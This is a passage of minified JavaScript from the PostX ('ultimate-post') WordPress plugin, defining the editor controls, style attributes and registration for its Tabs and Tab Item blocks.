Shadow","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"navPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-tab-toolbar-icon"},(0,o.createElement)(p,{label:"Typography",icon:n.Z.typography,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:5,data:{type:"typography",key:"descTypo",label:__("Description Typography","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-tab-toolbar-icon"},(0,o.createElement)(p,{label:"Icon Style",icon:r.ZP.five_star_line,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"toggle",key:"navIcon",label:__("Icon","ultimate-post")}},{position:5,data:{type:"select",key:"iconPosition",options:[{value:"left",label:__("Left of Title","ultimate-post")},{value:"right",label:__("Right of Title","ultimate-post")},{value:"top",label:__("Top of Title","ultimate-post")}],label:__("Icon Position","ultimate-post")}},{position:10,data:{type:"icon",key:"chooseIcon",label:__("Choose Icon","ultimate-post")}},{position:15,data:{type:"range",key:"iconSize",responsive:!0,unit:!0,min:1,max:150,step:1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"titleIconGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")}},{position:25,data:{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")}},{position:30,data:{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(c,null,(0,o.createElement)(p,{label:"Add Tab",onClick:()=>t()},(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item ultp-tab-toolbar-add-item"},r.ZP.plus,(0,o.createElement)("div",{className:"__label"},__("Add Tab","ultimate-post"))))))}},20641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={tabMainArr:{type:"string",default:'[{"nav_id":1,"container_id":1,"nav_text":"Nav Item 1","active":true},{"nav_id":2,"container_id":2,"nav_text":"Nav Item 2","active":false},{"nav_id":3,"container_id":2,"nav_text":"Nav Item 3","active":false}]'},tabMainData:{type:"string",default:""},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},editorSelectedTab:{type:"string",default:"0"},tabItems:{type:"string",default:"[]"},defaultOpenTab:{type:"string",default:"0"},layout:{type:"string",default:"top"},tabFullWidth:{type:"boolean",default:!1,style:[{depends:[{key:"tabResponsive",condition:"!=",value:"slider"},{key:"layout",condition:"==",value:"top"}]},{depends:[{key:"tabResponsive",condition:"!=",value:"slider"},{key:"layout",condition:"==",value:"bottom"}]}]},stackOnMobile:{type:"boolean",default:!1,style:[{depends:[{key:"stackOnMobile",condition:"==",value:!0},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"left"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!0},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"right"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!1},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"left"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!1},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"right"}]}]},tabJustifyAlignment:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"left"},{key:"layout",condition:"!=",value:"right"},{key:"tabResponsive",condition:"!=",value:"normal"},{key:"tabResponsive",condition:"!=",value:"slider"},{key:"tabFullWidth",condition:"!=",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] { justify-content:{{tabJustifyAlignment}}; }'},{depends:[{key:"layout",condition:"!=",value:"left"},{key:"layout",condition:"!=",value:"right"},{key:"tabResponsive",condition:"==",value:"normal"},{key:"tabResponsive",condition:"!=",value:"slider"},{key:"tabFullWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-tab-normal .ultp-tabs-nav-wrapper { justify-content:{{tabJustifyAlignment}}; }"}]},initialOpen:{type:"string",default:"1"},tabChange:{type:"string",default:"click"},navTitle:{type:"boolean",default:!0},navIcon:{type:"boolean",default:!1},navDescription:{type:"boolean",default:!1},activetab:{type:"string",default:"0"},navContentAlignment:{type:"string",default:"left",style:[{depends:[{key:"navContentAlignment",condition:"==",value:"center"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: center; align-items: center !important;}'},{depends:[{key:"navContentAlignment",condition:"==",value:"left"},{key:"iconPosition",condition:"!=",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-start; align-items:  center; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"left"},{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-start; align-items: flex-start; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"right"},{key:"iconPosition",condition:"!=",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-end; align-items: flex-end !important; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"right"},{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-end; align-items: flex-end !important; }'}]},tabArrowEnable:{type:"boolean",default:!0,style:[{depends:[{key:"tabArrowEnable",condition:"==",value:!1}]},{depends:[{key:"tabArrowEnable",condition:"==",value:!0}]},{depends:[{key:"tabArrowEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"left"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-nav-right>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-left: 10px; } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-nav-left>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-right: 10px; }\n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow { left: calc( 50% + 0px );  } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { left: calc( 50% + 0px ); }\n                "},{depends:[{key:"tabArrowEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"right"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-nav-right>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-left: 10px; } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-nav-left>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-right: 10px; }\n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow { left: calc( 50% + 10px );  } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { left: calc( 50% + 10px ); }\n                "}]},navGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"], .postx-page {{ULTP}} > .ultp-block-wrapper > .ultp-tab-accordion > .ultp-tabs-nav-wrapper  { gap:{{navGap}}; }'}]},navMinWidth:{type:"object",default:{lg:"115",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { min-width:{{navMinWidth}}; }'},{depends:[{key:"layout",condition:"==",value:"bottom"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { min-width:{{navMinWidth}}; }'}]},navMaxWidth:{type:"object",default:{lg:"300",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"left"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { max-width:{{navMaxWidth}}; }"},{depends:[{key:"layout",condition:"==",value:"right"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { max-width:{{navMaxWidth}}; }"}]},navBg:{type:"object",default:{openColor:1,type:"color",color:"#E6E6E6"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element::after'}]},navBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element'}]},navRadius:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { border-radius:{{navRadius}}; }'}]},navShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element'}]},navHoverBg:{type:"object",default:{openColor:1,type:"color",color:"#2E2E2E"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover::after,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tab-active.ultp-tabs-nav-element::after'}]},navHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active'}]},navHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active { border-radius:{{navHoverRadius}}; }'}]},navHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active'}]},navPadding:{type:"object",default:{lg:{top:"12",bottom:"12",left:"32",right:"32",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active { padding: {{navPadding}}; }'}]},titleTag:{type:"string",default:"h4"},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"navTitle",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > div > .ultp-tab-title'}]},titleColor:{type:"string",default:"#070707",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > div > .ultp-tab-title { color: {{titleColor}};}'}]},titleHoverColor:{type:"string",default:"#fff",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > div > .ultp-tab-title, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > div > .ultp-tab-title { color: {{titleHoverColor}}; }'}]},iconPosition:{type:"string",default:"left",style:[{depends:[{key:"iconPosition",condition:"==",value:"left"}]},{depends:[{key:"iconPosition",condition:"==",value:"right"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon { order: 2; }'},{depends:[{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { flex-direction: column; align-items: flex-start;}'}]},chooseIcon:{type:"string",default:"rightArrowLg"},iconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg { height:{{iconSize}}; width:{{iconSize}}; }'}]},titleIconGap:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { gap:{{titleIconGap}}; }'}]},iconColor:{type:"string",default:"#0A0D14",style:[{depends:[{key:"navIcon",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg { color:{{iconColor}}; color:{{iconColor}}; }'}]},iconHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"navIcon",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg { color:{{iconHoverColor}}; color:{{iconHoverColor}}; }'}]},descTypo:{type:"object",default:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{depends:[{key:"navDescription",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc'}]},descGapTitle:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc { margin-top:{{descGapTitle}}; }'}]},descColor:{type:"string",default:"#000",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc { color: {{descColor}}; }'}]},descHoverColor:{type:"string",default:"#C5C5C5",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-desc,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-desc { color: {{descHoverColor}}; }'}]},tabBodyGap:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper { gap:{{tabBodyGap}}; }"}]},tabBodyMinHeight:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { min-height: {{tabBodyMinHeight}}; }"}]},tabBodyBg:{type:"object",default:{openColor:0,type:"color",color:"#10b981",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:""},unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content  > .wp-block-ultimate-post-tab-item { border-radius:{{tabBodyRadius}}; }"}]},tabBodyShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { margin: {{tabBodyMargin}}; }"}]},tabBodyPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { padding: {{tabBodyPadding}}; box-sizing: border-box; }"}]},navWrapBg:{type:"object",default:{openColor:0,type:"color",color:"#10b981",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper"}]},navWrapBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper"}]},navWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:""},unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { border-radius: {{navWrapRadius}}; }"}]},navWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { padding:{{navWrapPadding}}; }"}]},navWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { margin:{{navWrapMargin}}; }"}]},enableAutoPlay:{type:"boolean",default:!1},enableProgressBar:{type:"boolean",default:!1,style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}]}]},autoPlayDuration:{type:"string",default:"1.5",style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar { animation-duration: {{autoPlayDuration}}s; }'}]},barBgColor:{type:"object",default:{openColor:1,type:"color",color:"#7167FF",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar'}]},barBgSize:{type:"object",default:{lg:"4"},style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar { height: {{barBgSize}}px; top: calc(100% - {{barBgSize}}px) }'}]},tabResponsive:{type:"string",default:"normal"},tabSliderArrowSize:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg path, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg,\n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg path { height:{{tabSliderArrowSize}}; width:{{tabSliderArrowSize}}; }\n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { padding: calc({{tabSliderArrowSize}} - 8px); }"}]},tabSliderArrowColor:{key:"string",default:"#fff",style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg { color:{{tabSliderArrowColor}}; }"}]},tabSliderArrowBg:{key:"object",default:{openColor:1,type:"color",color:"#070707"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},96519:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(20641),n=l(55350),r=l(88625),s=l(23232);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/tabs-block/","block_docs");p(n,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/tabs.svg",alt:"Tabs"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display content in pages/posts under different tabs.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c},__("Documentation","ultimate-post"))),attributes:i.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/tabs.svg"}},edit:r.Z,save:s.Z})},4015:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(87462),a=l(67294),i=l(53049),n=l(99838);const{__}=wp.i18n,{useEffect:r,useRef:s}=wp.element,{InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{getBlockAttributes:u,getBlockRootClientId:d,getBlockOrder:m,getBlockIndex:g,hasSelectedInnerBlock:y}=wp.data.select("core/block-editor"),{updateBlockAttributes:b}=wp.data.dispatch("core/block-editor"),v=e=>{const{setAttributes:t,name:l,attributes:v,className:h,clientId:f,attributes:{blockId:k,currentPostId:w,advanceId:x,previewImg:T,tabIndex:_,tabActive:C,disableChild:E}}=e;s(null),r((()=>{const e=f.substr(0,6),l=u(d(f));(0,i.qi)(t,l,w,f),k?k&&k!=e&&(l?.hasOwnProperty("ref")||(0,i.k0)()||l?.hasOwnProperty("theme")||t({blockId:e})):t({blockId:e})}),[f]);const S=g(f),P=d(f)||null,{activetab:L}=u(P),I=m(f).length>0;let B;if(r((()=>{L==_||E||((0,i.Gu)(f),(0,i.Gu)(P),b(P,{activetab:_.toLocaleString()}),t({disableChild:!1}))}),[S]),r((()=>{!e.isSelected&&!y(f)||L==_||E||((0,i.Gu)(f),(0,i.Gu)(P),b(P,{activetab:_.toLocaleString()}))}),[e.isSelected,f,L,_,E,P]),r((()=>{t(L==_?{tabActive:!0}:{tabActive:!1})}),[L,_]),k&&(B=(0,n.Kh)(v,"ultimate-post/tab-item",k,(0,i.k0)())),T)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});r((()=>{E&&t({disableChild:!1})}),[E]);const U=c({...x&&{id:x},className:`ultp-block-${k} ${h||""} ${C?"active":""}`});return(0,a.createElement)("div",(0,o.Z)({},U,{"data-tabindex":_}),B&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:B}}),(0,a.createElement)(p,{templateLock:!1,renderAppender:I?void 0:()=>(0,a.createElement)(p.ButtonBlockAppender,null)}))}},75775:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,tabIndex:r,tabActive:s}=e.attributes,p=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,a.createElement)("div",(0,o.Z)({},p,{"data-tabindex":r,style:{order:2*Number(r)}}),(0,a.createElement)(i.Content,null))}},10452:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},tabIndex:{type:"string",default:""},tabActiveFrontend:{type:"string",default:""},tabActive:{type:"boolean",default:!1},nav_desc:{type:"string",default:""},nav_text:{type:"string",default:""},nav_icon:{type:"string",default:""},disableChild:{type:"boolean",default:!1},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},35946:(e,t,l)=>{"use strict";var o=l(67294),a=l(4015),i=l(75775),n=l(10452),r=l(71573);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{parent:["ultimate-post/tabs"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/tabs.svg",alt:"Tab Item svg"}),attributes:n.Z,edit:a.Z,save:i.Z})},43239:(e,t,l)=>{"use strict";l.d(t,{Z:()=>k});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(25335),s=l(73151),p=l(62453);const{__}=wp.i18n,{useBlockProps:c,InspectorControls:u}=wp.blockEditor,{useEffect:d,useState:m,useRef:g,Fragment:y}=wp.element,{Spinner:b,Placeholder:v}=wp.components,{getBlockAttributes:h,getBlockRootClientId:f}=wp.data.select("core/block-editor");function k(e){const 